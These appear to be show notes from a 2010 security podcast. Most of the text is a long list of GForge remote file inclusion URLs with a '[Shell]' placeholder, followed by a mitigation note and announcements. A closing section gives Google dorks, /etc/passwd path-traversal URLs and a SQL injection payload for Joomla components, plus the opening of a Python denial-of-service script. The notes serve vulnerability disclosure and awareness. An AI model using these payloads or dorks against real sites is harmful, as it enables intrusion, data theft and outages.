    http://www.sample.com/[path]/common/include/RoleObserver.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/Group.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/System.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/User.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/common/include/system/LDAP.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/system/NSSPGSQL.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/system/pgsql.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/include/system/UNIX.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/mail/MailingList.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/mail/MailingListFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/import_utils.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectTask.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectCategory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectTaskFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectGroup.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectTasksForUser.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/pm/ProjectGroupFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportGroupCum.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportSiteAct.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportUserAdded.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportProjectAct.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportSiteTime.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportUserCum.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportDownloads.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportProjectTime.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportTrackerAct.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportUserTime.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportGroupAdded.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportSetup.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/ReportUserAct.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/reporting/TimeEntry.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/scm/SCMFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/ArtifactSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/ForumsSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/ProjectSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/TrackersSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/DocsSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/FrsSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/ExportProjectSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/NewsSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/SkillSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/ForumSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/PeopleSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/search/TasksSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/survey/SurveyResponse.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/survey/SurveyFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/survey/SurveyResponseFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/survey/SurveyQuestion.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/survey/SurveyQuestionFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/Artifact.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactExtraField.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactFromID.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactQueryFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactTypeFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactExtraFieldElement.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactHistory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/Artifacts.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactTypes.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactBoxOptions.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactFactory.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactMessage.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactsForUser.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactCanned.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactFile.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/common/tracker/ArtifactType.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/cronjobs/forum_gateway.php?gfwww=[Shell]

    http://www.sample.com/[path]/cronjobs/ftp_create_group_access.php?gfwww=[Shell]

    http://www.sample.com/[path]/cronjobs/send_pending_items_mail.php?gfwww=[Shell]

    http://www.sample.com/[path]/cronjobs/stats_projects-backfill.php?gfwww=[Shell]

    http://www.sample.com/[path]/cronjobs/tracker_gateway.php?gfwww=[Shell]

    http://www.sample.com/[path]/cronjobs/update_filesize.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/aselectextauth/include/ASelectAuthPlugin.class.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/aselectextauth/include/aselectextauth-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/contribtracker/common/contribtracker-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/contribtracker/common/cvssyncmail-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/contribtracker/include/cvssyncmail-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/cvstracker/common/cvstracker-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/eirc/include/eirc-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/eirc/www/eirc.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/externalsearch/include/ExternalHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/externalsearch/include/ExternalSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/externalsearch/include/externalsearch-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/externalsearch/include/ExternalSearchPlugin.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/extratabs/extratabs-init.php?GLOBALS[sys_plugins_path]=[Shell]

    http://www.sample.com/[path]/plugins/fckeditor/common/fckeditor-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/globalsearch/common/globalsearch-init.php?GLOBALS[sys_plugins_path]=[Shell]

    http://www.sample.com/[path]/plugins/helloworld/common/helloworld-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/ldapextauth/include/ldapextauth-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/ldapextauth/include/LdapExtAuthPlugin.class.php?GLOBALS[gfcommon]=[Shell]

    http://www.sample.com/[path]/plugins/mantis/include/mantis-init.php?gfplugins?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/mediawiki/common/mediawiki-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/online_help/common/online_help-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/projectlabels/common/projectlabels-init.phpGLOBALS[sys_plugins_path]=[Shell]

    http://www.sample.com/[path]/plugins/projects_hierarchy/common/projects_hierarchy-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/projects_hierarchy/www/wait_son.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/quota_management/common/quota_management-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/quota_management/www/index.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/quota_management/www/quota.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/quota_management/www/quota_admin.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/quota_management/www/quota_project.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/scmarch/common/scmarch-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmbzr/common/scmbzr-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmccase/common/scmccase-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmcpold/common/scmcpold-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmcvs/common/scmcvs-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmcvs/ftp_create.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/scmdarcs/common/scmdarcs-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmgit/common/scmgit-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmhg/common/scmhg-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/scmsvn/common/scmsvn-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/svncommitemail/common/svncommitemail-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/svntracker/bin/post.php?gfconfig=[Shell]

    http://www.sample.com/[path]/plugins/svntracker/common/svntracker-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/common/webcalendar-init.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/activity_log.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/add_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/admin.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/admin_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/adminhome.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/approve_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/assistant_edit.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/assistant_edit_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/availability.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/category.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/category_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/colors.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/datesel.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/day.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/del_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/del_layer.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_entry_handler.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_layer.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_layer_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_nonusers.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_nonusers_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_report.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_report_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_template.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_user.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/edit_user_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/export.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/export_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/group_edit.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/group_edit_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_admin.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_bug.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_edit_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_import.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_index.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_layers.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/help_pref.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/import.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/import_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/layers.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/layers_toggle.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/list_unapproved.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/month.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/nonusers_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/pref.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/purge.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/reject_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/report.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/search.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/search_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/select_user.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/set_entry_cat.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/users.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/usersel.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_d.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_entry.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_l.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_m.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_t.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_v.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/view_w.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/views.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/views_edit.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/views_edit_handler.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/week.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/week_details.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/webcalendar/www/year.php?gfplugins=[Shell]

    http://www.sample.com/[path]/plugins/wiki/common/WikiGroupSearchEngine.class.php?GLOBALS[gfwww]=[Shell]

    http://www.sample.com/[path]/plugins/wiki/common/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]

    http://www.sample.com/[path]/plugins/wiki/common/WikiHtmlSearchRenderer.class.php?GLOBALS[gfwww]=[Shell]

    http://www.sample.com/[path]/plugins/wiki/common/WikiSearchQuery.class.php?GLOBALS[gfcommon]=[Shell]

    http://www.sample.com/[path]/plugins/wiki/include/WikiGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/wiki/include/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]

    http://www.sample.com/[path]/plugins/wiki/include/WikiHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/plugins/wiki/include/WikiSearchQuery.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/utils/fixscripts/tools_data_cleanup.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/index_std.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/docman/include/DocumentGroupHTML.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/forum/admin/ForumAdmin.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/forum/include/AttachManager.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/forum/include/ForumHTML.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/include/stats_function.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/include/user_home.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/include/features_boxes.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/include/note.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/include/pre.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/include/Layout.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/include/project_home.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/admin_ha.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/activity.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/adminhom.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/add_entr.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/approve_.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/admin.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/plugins/webcalendar/assistan.php?gfplugins=[Shell]

    http://www.sample.com/[path]/www/pm/add_task.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/pm/mod_task.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/pm/browse_task.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/pm/postuploadcsv.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/pm/downloadcsv.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/pm/include/ProjectGroupHTML.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/pm/include/ProjectTaskHTML.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/pm/msproject/msp.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/pm/msproject/xmlparser.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/reporting/timeentry.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/search/include/SearchManager.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/ArtifactSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/FrsGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/TasksGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/DocsGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/GroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/TrackersGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/ForumSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/NewsGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/engines/ForumsGroupSearchEngine.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/AdvancedSearchHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/ForumsHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/HtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/ProjectRssSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/TasksHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/ArtifactHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/FrsHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/NewsHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/RssSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/TrackersHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/DocsHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/FullProjectHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/PeopleHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/ForumHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/HtmlGroupSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/ProjectHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/search/include/renderers/SkillHtmlSearchRenderer.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/soap/common/group.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/common/user.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/docman/docman.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/frs/frs.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/pm/pm.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/reporting/timeentry.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/tracker/query.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/soap/tracker/tracker.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/squal/get_session_hash.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/survey/include/SurveyHTML.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/themes/gforge/Theme.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/themes/gforge-classic/Theme.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/themes/gforge-simple-theme/Theme.class.php?gfwww=[Shell]

    http://www.sample.com/[path]/www/tracker/browse.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/tracker/downloadcsv.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/tracker/query.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/tracker/include/ArtifactFileHtml.class.php?gfcommon=[Shell]

    http://www.sample.com/[path]/www/tracker/include/ArtifactHtml.class.php?gfcommon=[Shell]

In almost all the preceding cases, the vulnerability could be trivially mitigated through input validation. In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function, most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive and if enabled it allows filesystem functions to use a URL which allow them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.
A simple check for non-alphanumeric characters would suffice in most of these cases. However, where possible we would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Stories of Interest:
News item 1:  http://www.theregister.co.uk/2010/04/16/pacemaker_security_tattoo/
A Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies.

The proposal, by Stuart Schechter of Microsoft Research, is the latest to grapple with the security of implanted medical devices equipped with radio transmitters they can be controlled without the need for surgery. Besides pacemakers, other types of potentially vulnerable devices include insulin pumps and cardiac defibrillators.

In 2008, researchers demonstrated that heart monitors were susceptible to wireless hacks that caused pacemakers to shut off or leak personal information. But equally devastating are scenarios in which physicians are unable to provide emergency care because they don’t have the access codes needed to control the devices.

In a paper published last week, Schechter proposed that access to such devices be controlled with encryption similar to what’s used on wi-fi networks. Access keys would then be tattooed on patients using ink that’s invisible under most conditions.

InfoSec Daily Podcast

 
ISD Podcast Episode 111 for April 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Joomla Component JProject Manager is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0 is impacted, though others may be as well.  Google Dork inurl:com_jprojectmanager. Example URL is available: http://www.sample.com/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
2. Joomla Component Jfeedback! is subject to a Local File Inclusion (LFI) vulnerability. Version 1.2 is impacted, though others may be as well.  Google Dork inurl:com_jfeedback. Example URL is available: http://www.sample.com/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
3. Joomla Component JA Job Board is subject to a Local File Inclusion (LFI) vulnerability. Version 1.4.4 is impacted, though others may be as well.  Google Dork inurl:com_jajobboard. Example URL is available: http://www.sample.com/index.php?option=com_jajobboard&view=../../../../../../../../../../etc/passwd%00

   http://www.sample.com/index.php?option=com_jajobboard&controller=../../../../../../../../../../etc/passwd%00

4. Joomla Component Ticketbook is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:com_ticketbook. Example URL is available: http://www.sample.com/index.php?option=com_ticketbook&controller=../../../../../../../../../../etc/passwd%00
5. Joomla Component TweetLA! is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:=com_tweetla. Example URL is available: http://www.sample.com/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
6. Joomla Component papers is subject to a SQL Injection vulnerability. Google Dork inurl:option=com_papers.  Example URL is available:

   http://www.sample.com/xampp/joomla/index.php?ption=com_papers&task=details&sid=943/**/AND+1=2/**/UNION/**/SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

7. Joomla Component Multi-Venue Restaurant Menu Manager is subject to a SQL Injection vulnerability. Versions older than 1.5.2 Stable Update 3 are impacted, though others may be as well. Google Dork inurl:option=com_mv_restaurantmenumanager.  Example URL is available: http://www.sample.com/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=XX&mid=XX&Itemid=XX
8. vBulletin “Cyb – Advanced Forum Statistics” is subject to a Denial of Service vulnerability. Exploit code is available:
   #!/usr/bin/python
   import urllib,urllib2,re
   print “####################################”
   print “#[+]ICW 0-day Domain Crasher #”
   print “#[+] Exploit found by Yash [ICW] #”
   print “#[+] Exploit Coded by FB1H2S [ICW] #”
   print “#[+] Care-Taker d4rk-blu [ICW] #”
   print “#[+] Indian Cyber Warriors #”
   print “####################################\n”
   print “Enter Domain Adress:”
